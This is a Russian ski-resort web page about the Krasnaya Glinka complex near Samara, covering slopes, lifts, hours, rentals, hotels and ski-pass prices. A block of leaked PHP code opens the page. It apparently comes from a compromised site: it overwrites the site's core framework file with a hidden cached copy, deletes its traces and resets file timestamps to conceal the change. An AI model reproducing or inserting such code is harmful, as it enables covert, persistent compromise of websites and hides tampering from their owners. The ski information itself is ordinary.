$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Красная глинка | горнолыжки
Баннер

Красная глинка

Описание

Посмотреть красивые фото

Обсудить на форуме...

Цены на курорте

Горнолыжный комплекс Красная Глинка расположен недалеко от Самары, в поселке Красная Глинка.

[Нажмите для увеличения]

Склон: 7 склонов на любой вкус, как пологие для новичков так и крутые склоны на которых проводятся соревнования. Есть сноупарк.


Плюсы

- Самая лучшая трасса на сегодняшний день по Самарской области по протяженности, количеству спусков, качеству подъемников и сервису.

- Есть кресельный подъёмник

- Наличие инструктора — очень полезная вещь.

Минусы

- В выходные достаточно тесновато

- После того как вы удобно разместились на кресильном подъёмнике не факт что вы слезете с него без травм потому что на сходе бегущая дорожка не предусмотрена и приходиться бежать сломя голову чтобы не вас не зацепило, едущее позади, кресло.

- Цены. Глина позиционирует себя по евростандарту устроенной, поэтому и цены такие. А что, есть клиент и будет, почему бы не делать такие цены, в общем-то тут осуждать не за что, спрос рождает предложение;). По сравнению с Банным (и даже с Абзаково) Глина — как советская столовка по сравнению с рестораном. И по склонам (не рельеф — это понятно — а уход), и по подъёмникам, и по вообще всей инфраструктуре. А Глина — убогость по сравнению хоть с тем же Уралом. На те деньги, которые люди тратят в сезон на Глине, можно на Урале или Кавказе накататься по уши.

Технические характеристики горнолыжного комплекса ГЛЦ «Красная глинка» (Самара, пос. Красная глинка):

Перепад высот ~170м
Характеристика трасс:

Основа для ГЛЦ «Красная Глинка» - это Сокольи горы и гора Кузнецова.
Склон «Центральный» относится к категории склонов скоростного спуска. Длина 750 м.
Склон «Северный» относится к категории склонов специального слалома. Длина 700 м.
Склон «Южный». Слалом-гигант. Длина 1000 м.  
Сноуборд-парк. Имеется подъемник «Бебилифт». Парк освещается в темное время суток, оснащен автономной аудиосистемой, разноуровневыми спортивными снарядами и сооружениями, снегопроизводящей системой. Трамплины «Биг Эйр» и «Тэйбл» различной величины для новичков и более опытных спортсменов, для профессионалов перила «Рэйл» и «Мэйлбокс», «Кватерпайп», а также полноценный Халфпайп длиной 120 м и высотой стенок 3 м.

Общая протяженность: 3км

Характеристика подъемников:
- Бугельный Т-образный подъемник VL-1000 ("швабра") производства Чехии длиной 700 м. Пропускная способность 650 чел./час. 
- DOPPELMAYER – подъемник производства Австрии. Имеет длину 700 м, пропускную способность - 800 чел/час.
- Отечественный бугельный подъемник БКД-500. Длина 3х150 м. Пропускная способность 150 чел/час. 
- Новый кресельный подъемник 4-CLF.  
Кроме подъемников работает также пять стационарных лыже-буксиров: два длинных для подъема от подножия на вершину Красной Глинки и три коротких.

Часы работы:
понедельник: с 18:00 до 22:00, 
вторник - суббота: с 9:00 до 22:00,  
воскресенье: с 9:00 до 19:00.

Кафе \ Ресторан \ Гостиницы

Можно остановиться в гостиничном комплексе самого ГЛЦ «Красная Глинка». Это две гостиницы, расположенные недалеко от станции подъемника. К услугам туристов двухместные номера со всеми удобствами. 
Среди достопримечательностей самого поселка Красная Глинка - памятник Счастливой семье, расположенный на въезде в него. Неподалеку от места впадения р.Сок в р. Волгу находится Царев курган. Свое название этот курган получил после того, как весной 1722 года царь Петр I по дороге в Персию поставил на его вершине деревянный крест, который, кстати, сделал своими руками. Курган находится в центре поселка Волжский, что расположен за северной границей Самары, т.е. недалеко от поселка Красная глинка.

Инструкторы

Обучение. К услугам гостей индивидуальные и групповые занятия с квалифицированными инструкторами.

Прокат/Ремонт инвентаря
В центре работает прокат горнолыжного инвентаря, коньков и беговых лыж. Для детей открыта частная школа по горнолыжному спорту.

Состояние прокатного снаряжение вполне приличное, на 3 из 4. Сноуборды в основном, Rossignol, с гладкими скользяками. Крепления мягковатые, пластиковые, именно прокатного уровня. Состояние ботинок – отличное, можно брать без боязни. Размеры есть все и в наличие их достаточное количество. Бывают случаи, когда прокатного снаряжения не хватает, но это в основном в праздники и на вторую смену катания в выходные.

Как добираться

Как добираться до ГЛЦ «Красная глинка»

Карта

Контактная информация

г. Самара, п.Красная Глинка,
Тел.: +7 (846) 973-96-95, +7 (846) 978-56-07.


Цены

Будни/Выхи.
день 600/1100
вечер 550/900
1час 200/300
2часа 350/500
3часа 450/650
1подьем 80/100
3подьема 200/250
5подьемов 250/300
10 подьемов 400/450
льготный в будни 3часа 300

Длительные ски-пассы, меньшая цена это при покупки более 3х абонементов.
на неделю 3500/2500
месяц 9000/6500
сезон 18000/14000

 

Обсудить на форуме...


Коментарии:

 
.

Последние новости

Популярные статьи

Новости
Открытие сезона на ГЛЦ "Царевщина"

Ну вот и дождались любители горных лыж и сноуборда открытия ГЛЦ "Царевщина". Сегодня был полноценный рабочий день на этом комплексе. Снегу накидали достаточно, земли нигде не видно. В некоторых местах есть лёд. Народу немного, на подъёмнике очередей нет. Цены остались на уровне прошлого сезона: 1 смена с 10 до 15 - 600р, 2 смена с 13 до 17 - 700р, 3 смена с 17 до 21 - 300р (в выходные дни). В будние дни соответственно 250 - 300 - 200руб. Работает как всегда только центральная трасса.

 
Новости ГЛК Красная глинка

По заявлениям представителей ГЛК  Красная Глинка, что неподалёку от Самары, открытие намечено не 2 декабря, в настоящее время активно идёт подготовка склонов. На Юге убрали не работающий подъемник, трасса стала шире. Сейчас снежат Восточный склон. К открытию скорее всего будут работать Центр, Восток и если успеют то и Юг.

 
Появился новый раздел "Народный магазин"
Подробнее ...
Красная глинка | горнолыжки

Как доехать на машине
*От:
*До:
Дай +1 :)
Сохранить в моб...
Яндекс.Метрика